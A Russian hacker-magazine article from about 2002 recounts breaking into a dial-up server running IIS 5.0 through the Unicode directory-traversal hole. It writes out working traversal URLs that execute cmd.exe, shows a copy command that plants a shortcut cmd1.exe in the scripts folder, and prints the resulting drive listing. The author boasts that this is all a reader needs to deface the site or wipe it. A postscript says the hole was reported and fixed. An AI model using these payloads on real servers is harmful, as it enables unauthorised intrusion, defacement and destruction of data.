= Безопасность =
БДИТЕЛЬНОСТЬ НИКОГДА НЕ БЫВАЕТ ЛИШНЕЙ
miller miller@bratva.ru
Дело было вечером... Погода пасмурная, сидел я перед монитором, уткнувшись в синий квадрат под названием "рабочий стол". Тут по аське стучится тип и просит проверить его на защищенность :), ссылаясь на то, что у него дырявая аська и т.п. (Ник спрятан, но те, кому надо, поймут, о ком идет речь - далее он будет Юрой) :). Ну я не долго думая, смотрю, какой у него IP, чтобы проверить его на защищенность. IP был - 62.148.***.***. Узнаю у Юры, что он подключен через модем к dial-up некоего сервера. Меня это сильно заинтересовало и я начал поиски первых дыр. Просканировав порты, увидел открытый 80-й порт и начал в него “стучаться”. Веб-сервер был Microsoft-IIS/5.0. Обрадовавшись и вспомнив такую великую вещь как unicode, попробовал его на деле. Попробовал несколько скриптов: нашлось два, может их и больше, но я пишу только ДВА :)
http://***-***.obninsk.com:80/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://***.***-***.obninsk.com:80/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
По умолчанию вы попадаете в папку c:\inetpub\wwwroot\... Каждый, кто знает чуть-чуть ms-dos, поймет, по какому принципу строится ссылка. Изменяя конец :) ссылки, вы будете попадать в разные папки сервера, так же можно просматривать не только диск c:, но и d: и т.д. Скопировав в папку scripts файл cmd.exe, я сократил ссылку в два раза - теперь она выглядит вот так:
http://****.obninsk.com/scripts/cmd1.exe?/c+dir+c:\ :
а сделал я это ТАК:
http://***-***.obninsk.com:80/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ copy+c:\winnt\system32\cmd.exe+cmd1.exe.
Теперь уж мы облегчили жизнь себе на столько, на сколько это возможно :) Вот содержимое диска C:
17.03.2002 20:06 <DIR> FOUND.000
17.03.2002 20:08 <DIR> WINNT
17.03.2002 20:15 <DIR> Documents and Settings
17.03.2002 20:16 <DIR> Program Files
17.03.2002 20:39 <DIR> Inetpub
17.03.2002 21:03 <DIR> WinGate 4.01
01.08.2002 09:54 72 192 httpodbc.dll
19.08.2002 19:52 <DIR> exch
1 файлов 72 192 байт
7 папок 683 540 480 байт свободно
Я рассказал вам все, что нужно, чтобы продолжить дефейс или потереть все к чертям:) А пока можно посмотреть на ЭТО:
скриншот
И вообще-то всем удачи и Don't worry, be happy :))))) Программы, которые использовались для взлома: SuperScan и ослик IE :)
P.S. пишите, предлагайте темы: все скажем, все расскажем :)
P.P.S. Редакция газеты предупредила администрацию сайта о найденной уязвимости до публикации этой статьи, и на данный момент указанная уязвимость устранена. Другим же админам описанный случай должен пойти впрок:)
Реальные IP-адреса в статье были заменены по просьбе пострадавших...
ССЫЛКИ ПО ТЕМЕ
Уязвимость unicode в IIS 4.0/5.0
|